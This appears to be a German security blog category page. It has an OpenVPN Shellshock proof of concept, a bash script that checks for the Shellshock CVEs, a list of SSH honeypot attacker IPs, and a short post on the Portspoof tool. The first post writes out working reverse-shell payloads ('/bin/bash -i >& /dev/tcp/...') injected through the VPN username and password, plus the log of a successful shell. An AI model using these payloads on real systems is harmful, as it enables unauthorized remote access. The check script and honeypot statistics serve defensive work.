Archiv der Kategorie: Security

OpenVPN ShellShock

von in Security | Hinterlasse einen Kommentar
  1. # OpenVPN ShellShock PoC
  2. # Based on Fredrik Strömberg’s HN post: https://news.ycombinator.com/item?id=8385332
  3. # Verified by @fj33r, posted at: http://sprunge.us/BGjP
  5. ### server.conf
  6. port 1194
  7. proto udp
  8. dev tun
  9. client-cert-not-required
  10. auth-user-pass-verify /etc/openvpn/user.sh via-env
  11. tmp-dir „/etc/openvpn/tmp“
  12. ca ca.crt
  13. cert testing.crt
  14. key testing.key  # This file should be kept secret
  15. dh dh1024.pem
  16. server 10.8.0.0 255.255.255.0
  17. keepalive 10 120
  18. comp-lzo
  19. user nobody
  20. group nogroup
  21. persist-key
  22. persist-tun
  23. client-cert-not-required
  24. plugin /usr/lib/openvpn/openvpn-auth-pam.so login
  25. script-security 3
  26. status openvpn-status.log
  27. verb 3
  29. ### user.sh
  30. #!/bin/bash
  31. echo $username
  32. echo $password
  34. ### start server
  35. openvpn server.con
  37. ### terminal 1
  38. nc -lp 4444
  40. ### terminal 2
  41. sudo openvpn –client –remote 10.10.0.52 –auth-user-pass –dev tun –ca ca.cert –auth-nocache –comp-lzo
  43. ### username && password were both shellshocked just incase
  44. user:() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 &
  45. pass:() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 &
  47. ### log
  48. Mon Sep 29 20:56:56 2014 NOTE: the current –script-security setting may allow this configuration to call user-defined scripts
  49. Mon Sep 29 20:56:56 2014 PLUGIN_INIT: POST /usr/lib/openvpn/openvpn-auth-pam.so ‚[/usr/lib/openvpn/openvpn-auth-pam.so] [login]‘intercepted=PLUGIN_AUTH_USER_PASS_VERIFY
  50. Mon Sep 29 20:56:56 2014 Diffie-Hellman initialized with 1024 bit key
  51. Mon Sep 29 20:56:56 2014 WARNING: POTENTIALLY DANGEROUS OPTION –client-cert-not-required may accept clients which do not present a certificate
  52. Mon Sep 29 20:56:56 2014 TLS-Auth MTU parms [ L:1542 D:138 EF:38 EB:0 ET:0 EL:0 ]
  53. Mon Sep 29 20:56:56 2014 Socket Buffers: R=[163840>131072] S=[163840>131072]
  54. Mon Sep 29 20:56:56 2014 ROUTE default_gateway=10.10.0.1
  55. Mon Sep 29 20:56:56 2014 TUN/TAP device tun0 opened
  56. Mon Sep 29 20:56:56 2014 TUN/TAP TX queue length set to 100
  57. Mon Sep 29 20:56:56 2014 do_ifconfig, tt->ipv6=0, tt->did_ifconfig_ipv6_setup=0
  58. Mon Sep 29 20:56:56 2014 /sbin/ifconfig tun0 10.8.0.1 pointopoint 10.8.0.2 mtu 1500
  59. Mon Sep 29 20:56:56 2014 /sbin/route add -net 10.8.0.0 netmask 255.255.255.0 gw 10.8.0.2
  60. Mon Sep 29 20:56:56 2014 Data Channel MTU parms [ L:1542 D:1450 EF:42 EB:135 ET:0 EL:0 AF:3/1 ]
  61. Mon Sep 29 20:56:56 2014 GID set to nogroup
  62. Mon Sep 29 20:56:56 2014 UID set to nobody
  63. Mon Sep 29 20:56:56 2014 UDPv4 link local (bound)[undef]
  64. Mon Sep 29 20:56:56 2014 UDPv4 link remote: [undef]
  65. Mon Sep 29 20:56:56 2014 MULTI: multi_init called, r=256 v=256
  66. Mon Sep 29 20:56:56 2014 IFCONFIG POOL: base=10.8.0.4 size=62ipv6=0
  67. Mon Sep 29 20:56:56 2014 Initialization Sequence Completed
  68. Mon Sep 29 20:57:54 2014 MULTI: multi_create_instance called
  69. Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Re-using SSL/TLS context
  70. Mon Sep 29 20:57:54 2014 10.10.0.56:1194 LZO compression initialized
  71. Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Control Channel MTU parms [ L:1542 D:138 EF:38 EB:0 ET:0 EL:0 ]
  72. Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Data Channel MTU parms [ L:1542 D:1450 EF:42 EB:135 ET:0 EL:0 AF:3/1 ]
  73. Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Local Options hash (VER=V4)‚530fdded‘
  74. Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Expected Remote Options hash (VER=V4)‚41690919‘
  75. Mon Sep 29 20:57:54 2014 10.10.0.56:1194 TLS: Initial packet from [AF_INET]10.10.0.56:1194sid=644ea55a 5f832b02
  76. AUTH-PAM: BACKGROUND: user ‚() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 &‘ failed to authenticate: Error in service module
  77. Mon Sep 29 20:57:57 2014 10.10.0.56:1194 PLUGIN_CALL: POST /usr/lib/openvpn/openvpn-auth-pam.so/PLUGIN_AUTH_USER_PASS_VERIFY status=1
  78. Mon Sep 29 20:57:57 2014 10.10.0.56:1194 PLUGIN_CALL: plugin function PLUGIN_AUTH_USER_PASS_VERIFY failed with status 1:/usr/lib/openvpn/openvpn-auth-pam.so
  79. _________/bin/bash_-i____/dev/tcp/10.10.0.56/4444_0__1__
  81. Mon Sep 29 20:57:57 2014 10.10.0.56:1194 TLS Auth Error: Auth Username/Password verification failed for peer
  82. Mon Sep 29 20:57:57 2014 10.10.0.56:1194 Control Channel: TLSv1, cipher TLSv1/SSLv3 DHE-RSA-AES256-SHA
  83. Mon Sep 29 20:57:57 2014 10.10.0.56:1194 [] Peer Connection Initiated with [AF_INET]10.10.0.56:1194
  84. Mon Sep 29 20:57:59 2014 10.10.0.56:1194 PUSH: Received control message: ‚PUSH_REQUEST‘
  85. Mon Sep 29 20:57:59 2014 10.10.0.56:1194 Delayed exit in 5 seconds
  86. Mon Sep 29 20:57:59 2014 10.10.0.56:1194 SENT CONTROL [UNDEF]‚AUTH_FAILED‘ (status=1)
  87. Mon Sep 29 20:58:01 2014 read UDPv4 [ECONNREFUSED]: Connection refused (code=111)
  88. Mon Sep 29 20:58:04 2014 10.10.0.56:1194 SIGTERM[soft,delayed-exit] received, client-instance exiting
  90. ### nc listener
  91. nobody@debian:/etc/openvpn$ id
  92. id
  93. uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)

Shellshock Überprüfung

von in Security | Hinterlasse einen Kommentar
#!/bin/bash
warn() {
if [ „$scary“ == „1“ ]; then
echo -e „33[91mVulnerable to $133[39m“
else
echo -e „33[93mFound non-exploitable $133[39m“
fi
}
good() {
echo -e „33[92mNot vulnerable to $133[39m“
}
[ -n „$1“ ] && bash=$(which $1) || bash=$(which bash)
echo -e „33[95mTesting $bash …“
echo $($bash –version | head -n 1)
echo -e „33[39m“
#r=`a=“() { echo x;}“ $bash -c a 2>/dev/null`
if [ -n „$(env ‚a’=“() { echo x;}“ $bash -c a 2>/dev/null)“ ]; then
echo -e „33[91mVariable function parser active, maybe vulnerable to unknown parser bugs33[39m“
scary=1
elif [ -n „$(env ‚BASH_FUNC_a%%’=“() { echo x;}“ $bash -c a 2>/dev/null)“ ]; then
echo -e „33[92mVariable function parser pre/suffixed [%%, upstream], bugs not exploitable33[39m“
scary=0
elif [ -n „$(env ‚BASH_FUNC_a()’=“() { echo x;}“ $bash -c a 2>/dev/null)“ ]; then
echo -e „33[92mVariable function parser pre/suffixed [(), redhat], bugs not exploitable33[39m“
scary=0
elif [ -n „$(env ‚BASH_FUNC_<a>%%’=“() { echo x;}“ $bash -c a 2>/dev/null)“ ]; then
echo -e „33[92mVariable function parser pre/suffixed [<..>%%, apple], bugs not exploitable33[39m“
scary=0
else
echo -e „33[92mVariable function parser inactive, bugs not exploitable33[39m“
scary=0
fi
r=`env x=„() { :; }; echo x“ $bash -c „“ 2>/dev/null`
if [ -n „$r“ ]; then
warn „CVE-2014-6271 (original shellshock)“
else
good „CVE-2014-6271 (original shellshock)“
fi
cd /tmp;rm echo 2>/dev/null
env x=‚() { function a a>\‘ $bash -c echo 2>/dev/null > /dev/null
if [ -e echo ]; then
warn „CVE-2014-7169 (taviso bug)“
else
good „CVE-2014-7169 (taviso bug)“
fi
$($bash -c „true $(printf ‚<<EOF %.0s‘ {1..80})“ 2>/tmp/bashcheck.tmp)
ret=$?
grep -q AddressSanitizer /tmp/bashcheck.tmp
if [ $? == 0 ] || [ $ret == 139 ]; then
warn „CVE-2014-7186 (redir_stack bug)
else
good „CVE-2014-7186 (redir_stack bug)
fi
$bash -c „`for i in {1..200}; do echo -n „for x$i in; do :;“; done; for i in {1..200}; do echo -n „done;“;done`“ 2>/dev/null
if [ $? != 0 ]; then
warn „CVE-2014-7187 (nested loops off by one)
else
echo -e „33[96mTest for CVE-2014-7187 not reliable without address sanitizer33[39m
fi
$($bash -c „f(){ x(){ _;};x(){ _;}<<a;}“ 2>/dev/null)
if [ $? != 0 ]; then
warn „CVE-2014-6277 (lcamtuf bug #1)“
else
good „CVE-2014-6277 (lcamtuf bug #1)“
fi
if [ -n „$(env x='() { _;}>_[$($())] { echo x;}‘ $bash -c : 2>/dev/null)“ ]; then
warn „CVE-2014-6278 (lcamtuf bug #2)“
elif [ -n „$(env BASH_FUNC_x%%='() { _;}>_[$($())] { echo x;}‘ $bash -c : 2>/dev/null)“ ]; then
warn „CVE-2014-6278 (lcamtuf bug #2)“
elif [ -n „$(env ‚BASH_FUNC_x()’='() { _;}>_[$($())] { echo x;}‘ $bash -c : 2>/dev/null)“ ]; then
warn „CVE-2014-6278 (lcamtuf bug #2)“
else
good „CVE-2014-6278 (lcamtuf bug #2)“
fi

Honeypot Statistik

von in Honeypot, Linux, Security | Hinterlasse einen Kommentar

Ich habe mal eine Zusammenfassung erstellt über sämtliche angreifende IP Adressen (von 100 Angriffen aufwärts) die

versucht haben in meinen SSH Honeypot einzubrechen. 

Datum,   Zeit,   IP,     Anzahl Angriffe

02/20/2014 17:25:33,222.186.62.44,100
12/31/2013 05:54:26,117.21.127.215,100
08/24/2014 10:25:42,111.74.238.138,100
09/04/2014 11:09:58,115.112.206.171,100
10/23/2013 21:49:34,202.99.97.10,100
03/01/2014 16:03:21,182.131.22.235,101
06/06/2014 00:18:11,108.166.204.27,101
08/09/2013 07:19:19,119.145.254.34,102
06/27/2014 07:24:01,124.95.37.140,102
08/26/2014 23:02:09,180.97.28.240,103
07/07/2013 02:29:13,177.189.241.74,103
02/05/2014 13:18:29,222.186.62.7,103
01/04/2014 02:50:47,200.54.114.147,104
11/29/2013 19:01:04,213.20.227.137,104
06/10/2014 10:57:24,61.136.202.46,104
11/04/2013 03:34:28,113.35.119.247,105
08/06/2014 00:10:02,60.173.10.184,105
06/21/2014 16:06:28,116.10.191.190,106
09/12/2013 19:46:25,218.108.236.120,106
01/27/2014 14:33:37,61.160.215.217,106
12/12/2013 08:47:23,62.193.234.178,106
01/31/2014 13:17:17,61.160.215.85,106
02/09/2014 18:57:25,95.0.26.50,107
09/22/2013 11:34:58,183.232.32.24,107
07/19/2014 18:46:33,61.174.51.231,107
01/26/2014 15:24:51,222.186.62.43,108
07/26/2014 16:22:15,125.132.45.34,108
08/24/2014 15:26:26,111.74.238.153,111
03/04/2014 03:00:16,62.218.141.202,112
05/27/2014 16:50:28,222.81.22.51,112
05/26/2014 19:00:37,116.10.191.233,113
11/17/2013 12:46:39,95.69.254.73,114
05/19/2014 08:53:50,195.54.2.11,114
03/01/2014 11:31:19,27.72.207.71,114
02/06/2014 20:34:00,222.186.62.75,114
06/30/2014 04:42:55,116.10.191.176,115
02/27/2014 20:52:00,103.244.248.131,115
02/05/2014 04:43:05,222.186.62.19,115
11/14/2013 21:30:44,70.39.68.34,115
01/19/2014 17:13:29,61.160.213.154,116
03/12/2014 01:52:53,116.10.191.168,116
02/17/2014 20:13:45,222.186.62.47,116
01/16/2014 23:57:47,61.174.51.210,116
03/31/2014 16:46:28,50.136.189.29,117
11/17/2013 10:36:24,59.37.66.139,117
03/26/2014 04:20:47,117.79.148.40,118
02/02/2014 12:31:56,88.150.186.179,118
06/15/2014 22:40:14,116.10.191.173,118
07/11/2014 21:12:01,61.174.51.209,118
06/16/2014 02:22:11,69.241.87.154,118
11/01/2013 13:32:06,95.211.128.10,118
03/24/2014 02:21:27,59.144.32.34,119
10/23/2013 05:36:01,177.230.103.246,119
09/27/2013 14:56:35,212.12.177.33,119
07/22/2014 19:04:38,115.146.121.243,120
05/08/2013 17:37:48,198.199.106.192,120
03/19/2014 04:07:40,116.10.191.185,120
07/13/2014 06:50:39,91.185.234.18,120
02/07/2014 10:17:08,61.174.51.212,120
02/10/2014 10:20:46,61.160.215.60,121
06/29/2014 20:29:02,117.21.191.18,121
07/04/2013 02:39:58,61.182.202.57,121
04/02/2014 12:19:21,62.76.102.34,122
07/08/2014 18:02:20,61.174.51.205,122
04/21/2013 23:13:43,212.202.219.22,122
05/16/2014 07:23:39,117.79.91.234,123
08/24/2014 11:37:27,111.74.238.125,123
07/28/2013 06:07:37,61.155.177.58,123
05/01/2014 01:36:23,61.174.51.198,124
05/05/2014 19:25:42,61.174.50.184,124
06/27/2014 03:13:26,61.174.51.194,124
03/22/2014 13:08:07,221.8.18.15,125
08/22/2014 05:56:04,61.174.51.196,125
07/16/2014 14:25:18,122.225.103.125,125
03/06/2014 09:52:19,61.147.103.71,127
06/10/2013 07:47:30,218.61.202.193,127
04/29/2013 14:35:14,216.197.192.153,127
04/20/2014 06:21:26,203.110.169.43,131
08/17/2014 18:12:09,116.10.191.183,131
05/27/2014 20:39:30,61.174.51.225,131
11/24/2013 18:27:00,60.191.232.53,131
02/03/2014 08:41:40,118.212.168.252,131
05/13/2014 16:31:18,116.10.191.227,131
02/11/2014 17:57:42,61.160.213.190,132
07/21/2014 06:48:19,116.10.191.200,133
05/06/2014 22:01:41,61.234.146.22,133
04/21/2014 14:00:13,201.73.83.248,134
04/19/2014 06:58:28,60.191.139.5,134
04/04/2014 13:35:48,116.10.191.220,136
04/26/2014 03:22:31,83.222.230.90,137
02/09/2014 04:31:10,58.215.173.114,137
04/19/2014 15:12:23,61.147.103.169,137
05/19/2013 04:53:13,124.248.32.69,137
04/22/2013 00:31:40,208.79.216.22,137
03/24/2014 02:14:46,117.79.91.231,138
02/07/2014 10:31:29,61.160.215.104,138
07/27/2014 10:51:45,61.174.51.221,138
02/05/2014 20:49:42,61.160.215.14,138
06/09/2013 12:20:41,119.163.120.182,138
07/31/2013 00:13:18,188.132.242.99,138
06/13/2013 14:39:08,115.236.185.75,139
06/12/2013 03:27:25,111.74.134.216,139
10/14/2013 03:02:05,137.189.51.213,140
08/20/2014 17:25:38,60.173.8.115,140
05/16/2014 18:29:35,96.232.235.207,141
07/24/2014 13:47:17,212.129.40.26,141
06/03/2014 18:36:42,61.174.50.235,141
02/04/2014 20:36:18,114.80.246.140,143
07/31/2014 00:17:11,61.174.51.207,143
06/18/2014 00:10:57,117.79.91.220,144
07/10/2014 16:19:51,1.93.29.133,145
03/26/2014 17:35:19,198.13.96.230,146
02/17/2014 09:58:08,91.121.203.75,146
05/13/2014 21:24:48,105.236.184.123,146
06/20/2014 12:47:14,116.10.191.215,146
08/05/2013 08:30:31,204.9.243.168,146
02/10/2014 18:49:00,222.186.62.36,147
08/22/2014 06:39:01,61.234.104.167,148
05/29/2014 03:19:10,58.240.17.250,148
08/14/2013 04:43:02,192.241.231.154,148
04/22/2013 21:53:01,31.3.154.243,148
08/23/2013 20:17:17,74.208.198.184,148
08/14/2014 07:45:46,116.10.191.204,149
07/20/2013 00:47:55,211.139.93.166,150
04/15/2014 19:13:20,183.203.191.66,150
06/16/2014 19:47:08,116.10.191.210,150
05/14/2014 05:10:01,116.10.191.179,150
07/29/2014 02:21:11,116.10.191.230,150
06/14/2014 23:45:46,116.10.191.223,150
03/11/2014 09:39:11,58.248.9.140,151
07/21/2014 08:35:44,116.10.191.231,152
01/22/2014 18:42:59,218.95.37.206,153
02/14/2014 07:17:06,222.186.62.21,153
01/02/2014 03:43:13,186.73.169.84,153
12/10/2013 03:06:02,222.211.86.204,155
05/12/2014 17:01:08,116.10.191.194,157
02/28/2014 21:12:19,61.174.51.208,159
05/02/2014 17:48:43,116.10.191.177,159
09/03/2014 00:48:24,116.10.191.205,159
06/14/2014 15:10:21,212.117.56.150,159
09/27/2013 05:31:09,221.7.135.253,160
08/28/2014 03:32:57,61.174.49.116,160
08/22/2014 21:55:30,116.10.191.167,161
08/17/2013 10:37:24,125.45.229.168,161
07/25/2013 07:58:36,69.36.57.4,162
05/09/2014 06:06:04,116.10.191.206,162
06/09/2013 08:24:28,222.134.62.171,163
06/27/2014 09:11:19,61.174.51.232,165
09/01/2013 03:53:06,91.221.70.182,166
12/17/2013 23:21:51,219.149.79.23,166
03/12/2014 04:23:13,122.228.207.199,167
04/06/2014 03:46:44,59.63.167.173,167
04/23/2014 12:44:28,61.174.51.219,167
10/13/2013 17:22:17,69.28.58.69,167
03/13/2014 08:46:44,119.39.124.227,170
07/31/2014 11:51:26,95.215.1.29,170
09/23/2013 04:24:16,119.40.117.183,170
05/21/2014 20:53:46,116.10.191.207,170
10/24/2013 12:51:32,60.191.232.54,171
05/26/2014 22:20:54,116.10.191.224,171
08/26/2014 12:10:45,116.10.191.197,172
05/11/2013 23:25:00,213.85.133.6,172
08/29/2014 15:41:55,222.163.192.159,174
04/22/2014 20:38:04,195.21.37.137,175
09/30/2013 17:52:00,202.111.52.58,175
08/20/2014 15:59:44,61.174.51.216,176
08/22/2014 21:48:10,60.173.26.53,177
08/17/2014 05:04:46,61.174.51.224,178
08/13/2014 09:55:50,61.161.156.75,179
06/06/2013 03:05:55,219.138.203.198,179
08/14/2014 04:32:29,116.10.191.209,179
08/26/2014 17:32:55,144.0.0.34,180
02/08/2014 06:55:33,61.188.87.218,180
05/16/2013 21:17:25,59.53.94.9,181
06/10/2014 13:34:55,116.10.191.195,181
02/13/2014 07:54:03,222.186.62.4,183
04/17/2014 12:37:14,61.174.51.206,183
06/08/2013 23:34:45,211.143.10.86,184
07/30/2013 06:13:30,79.136.40.102,184
09/25/2013 23:27:14,222.73.29.6,185
02/26/2014 01:40:45,117.21.127.90,187
05/09/2014 03:21:30,61.174.51.234,187
01/24/2014 15:05:48,218.2.22.148,187
08/20/2014 06:41:24,116.10.191.214,189
07/08/2014 18:45:15,116.10.191.236,189
06/15/2013 02:59:02,222.112.106.33,189
10/04/2013 21:57:45,59.55.149.103,190
07/23/2013 00:51:25,180.96.23.74,194
09/04/2013 05:22:35,223.4.214.12,194
05/11/2014 20:51:18,122.70.133.245,194
02/13/2014 14:34:56,219.153.13.45,194
06/27/2014 02:16:09,61.174.51.200,194
05/17/2014 20:15:33,116.10.191.170,197
08/26/2014 08:28:47,200.186.145.218,197
03/01/2014 00:18:23,1.93.30.190,198
09/18/2013 12:44:05,211.147.80.2,199
05/11/2014 00:41:33,61.174.51.211,200
02/09/2014 17:10:00,221.131.116.22,201
08/19/2014 21:08:49,61.143.236.193,203
09/30/2013 09:59:31,69.28.58.25,206
12/31/2013 13:03:57,112.91.240.230,207
09/25/2013 18:40:55,211.110.61.139,210
11/02/2013 13:38:05,218.88.253.222,210
02/01/2014 23:03:04,218.2.22.143,211
06/11/2014 14:02:19,116.10.191.184,211
09/20/2013 15:19:11,211.172.219.251,211
05/08/2014 07:40:20,116.10.191.228,211
02/15/2014 16:27:09,178.167.14.112,214
05/31/2013 21:56:51,97.65.247.35,216
04/06/2014 22:01:29,61.156.40.44,217
09/17/2013 18:28:58,178.151.125.55,217
03/27/2014 00:09:04,124.160.12.198,217
06/19/2013 19:18:27,85.10.138.107,218
05/04/2013 15:40:53,91.121.230.248,218
05/18/2013 08:57:45,121.162.231.101,218
04/18/2014 20:14:11,118.98.64.211,220
09/01/2013 05:18:56,115.21.12.241,223
06/18/2013 07:23:40,203.66.130.176,223
07/16/2013 12:41:16,210.13.194.61,224
01/05/2014 18:05:46,190.102.150.156,224
10/22/2013 03:06:55,146.185.246.51,227
05/03/2014 04:54:30,61.174.51.201,228
05/25/2013 20:59:36,118.123.240.176,228
07/13/2014 11:29:53,61.144.43.235,229
03/02/2014 23:40:16,109.170.33.83,230
08/29/2013 21:21:42,117.79.148.54,230
05/19/2014 01:50:59,108.166.204.26,234
08/24/2013 16:05:33,218.66.30.77,234
05/29/2014 12:30:23,116.10.191.208,235
05/06/2014 09:01:25,61.174.51.230,236
06/12/2014 06:58:48,116.10.191.229,236
05/28/2013 16:45:27,62.212.73.201,240
06/09/2014 15:16:17,1.93.29.129,240
06/19/2014 01:28:23,1.93.25.253,240
05/09/2014 23:59:50,116.10.191.211,241
05/15/2014 08:50:44,116.10.191.198,241
02/19/2014 23:24:39,218.108.0.73,242
01/30/2014 16:17:26,222.186.62.59,242
08/27/2014 00:20:56,116.10.191.164,244
08/12/2013 13:56:35,218.108.85.245,246
02/11/2014 11:23:59,222.186.62.34,248
10/11/2013 04:24:21,199.71.214.66,250
01/26/2014 11:28:45,219.92.48.42,252
10/24/2013 12:58:39,61.142.106.34,253
03/27/2014 02:39:21,119.146.223.228,258
07/13/2013 11:26:05,189.3.236.34,259
04/07/2014 16:31:00,211.115.111.203,260
08/18/2013 15:36:52,61.155.202.91,265
08/01/2014 15:03:33,60.173.11.22,275
08/16/2013 17:19:26,216.86.151.124,277
07/13/2013 09:10:02,113.107.101.234,278
03/05/2014 12:02:22,62.210.122.213,278
07/14/2014 20:39:55,1.93.33.222,279
07/17/2014 10:34:58,61.174.51.228,282
08/01/2013 10:56:22,190.85.249.71,283
03/02/2014 07:12:22,61.174.51.222,287
08/27/2013 02:40:14,203.92.40.147,289
04/18/2013 06:48:41,110.77.138.218,291
05/07/2013 05:36:02,125.227.195.180,291
02/08/2014 16:06:42,79.137.213.14,292
09/20/2013 12:13:06,1.234.45.178,298
01/08/2014 17:19:16,124.232.135.84,299
03/11/2014 23:51:01,87.197.152.170,301
12/30/2013 16:54:13,217.169.223.79,302
12/08/2013 03:29:54,195.208.36.229,303
12/19/2013 20:06:15,83.243.73.216,304
05/06/2014 13:26:19,116.10.191.175,304
06/21/2013 07:27:16,61.19.121.131,305
08/11/2014 20:49:36,61.174.51.197,306
05/22/2014 21:21:12,1.93.26.15,312
02/09/2014 10:21:57,1.93.29.148,317
05/29/2014 13:27:40,1.93.26.17,318
06/27/2014 11:27:21,61.174.51.220,319
07/13/2014 19:51:05,31.186.5.187,322
03/17/2014 00:13:45,61.174.51.217,330
06/23/2014 12:15:03,1.93.32.185,330
01/29/2014 07:07:22,61.174.51.202,338
11/01/2013 05:18:13,23.88.103.21,345
04/07/2014 17:56:53,116.10.191.162,357
05/05/2014 14:46:11,200.75.104.220,367
05/13/2013 06:40:31,223.5.3.200,370
05/14/2014 19:29:04,220.177.198.51,376
11/27/2013 01:12:35,119.147.106.139,386
05/12/2014 17:08:21,1.93.37.213,390
12/09/2013 10:45:23,1.234.47.57,396
01/06/2014 08:24:45,1.93.29.149,400
04/30/2014 22:15:56,1.93.29.180,406
07/04/2014 12:37:45,116.10.191.202,414
02/18/2014 13:24:31,200.31.179.13,430
08/01/2013 13:40:59,222.255.29.52,437
06/15/2014 08:06:50,1.93.25.153,440
10/07/2013 21:11:15,118.122.120.128,473
04/15/2013 02:48:49,117.79.148.34,474
05/09/2014 16:28:50,1.93.29.135,476
02/11/2014 11:59:46,95.211.95.57,480
07/21/2014 23:09:06,60.173.11.113,483
06/06/2014 14:15:24,220.177.198.17,503
11/16/2013 16:34:48,202.43.10.238,506
01/04/2014 17:59:48,125.65.245.146,507
05/05/2013 08:51:41,220.161.148.178,521
03/06/2014 21:33:47,1.93.33.48,523
03/28/2014 18:23:03,1.93.24.83,539
11/29/2013 21:48:36,187.115.202.2,540
04/13/2013 23:15:15,211.118.104.11,544
03/26/2014 13:31:57,1.93.28.145,553
02/04/2014 20:29:10,124.173.121.190,558
07/22/2013 09:49:28,218.24.6.67,571
05/07/2014 08:38:57,1.93.29.78,573
11/13/2013 18:40:00,217.15.33.60,587
10/23/2013 14:04:16,85.232.244.50,598
03/31/2014 19:38:14,37.247.109.107,606
06/26/2013 07:07:01,178.254.33.37,610
09/15/2013 22:27:26,221.130.14.87,619
05/31/2014 16:31:23,1.93.34.234,620
08/16/2014 02:06:57,1.93.30.188,622
02/13/2014 02:03:17,1.93.34.238,659
11/06/2013 00:11:37,36.39.246.121,702
07/29/2013 02:46:00,1.232.34.242,713
05/18/2013 12:11:04,202.137.13.155,715
03/22/2014 23:30:56,1.93.25.165,716
03/10/2014 07:10:03,61.136.171.198,716
01/08/2014 06:42:11,1.93.34.211,746
06/24/2013 12:10:03,121.199.29.116,748
02/25/2014 02:10:30,124.160.194.27,748
08/06/2014 19:00:58,201.234.178.62,749
11/21/2013 10:02:16,212.83.150.15,754
02/21/2014 03:19:41,118.123.213.47,756
05/27/2013 11:10:19,193.231.236.98,759
06/25/2014 12:13:54,81.169.130.46,774
03/09/2014 18:38:26,1.93.24.12,791
04/16/2013 02:47:38,176.61.84.37,939
09/18/2013 22:52:31,176.97.153.2,945
08/20/2014 07:17:11,178.91.253.175,960
05/09/2013 18:41:03,60.251.199.172,1028
06/30/2013 08:06:46,220.164.144.135,1060
01/05/2014 13:40:55,1.93.33.2,1065
01/03/2014 22:47:22,124.173.121.123,1148
06/28/2014 18:42:47,95.173.165.215,1179
07/21/2014 06:12:32,1.93.37.231,1210
06/25/2014 07:40:46,1.93.29.137,1256
04/27/2013 14:01:47,38.113.189.154,1444
05/15/2013 22:37:19,218.108.131.172,1528
11/18/2013 16:53:51,119.147.104.114,1620
07/24/2014 04:28:45,1.93.37.215,1663
04/23/2013 00:59:08,88.191.184.163,1912
07/10/2013 17:20:21,223.4.208.56,2245
02/27/2014 04:52:46,210.51.10.158,2377
11/07/2013 00:10:25,69.162.121.226,2389
09/07/2013 21:53:59,116.228.51.45,3087
07/01/2013 21:05:47,27.251.106.154,4045
05/14/2013 20:22:29,116.229.239.243,4210
07/25/2014 10:31:48,62.210.188.89,6974

Attack the Attacker

von in Linux, Security | Hinterlasse einen Kommentar

http://n0where.net/portspoof/#fuzzing

Das scheint ein recht interessantes Anti-Portscan Programm zu sein.

Es bietet die Möglichkeit als Antwort Exploits zurückzuliefern (als Payload)

Features

  • User-land software and does not require root privileges !
  • Binds to just one tcp port per a running instance
  • Easily customizable through iptables rules
  • Marginal CPU/memory usage (multi-threaded)
  • More than 8000 dynamic service signatures are supported !
  • Will help you to automate your Active Defense attacks against your attackers tools and scripts


This tool is still a work in progress. Depending on my available time more features and enhancements are expected to be implemented.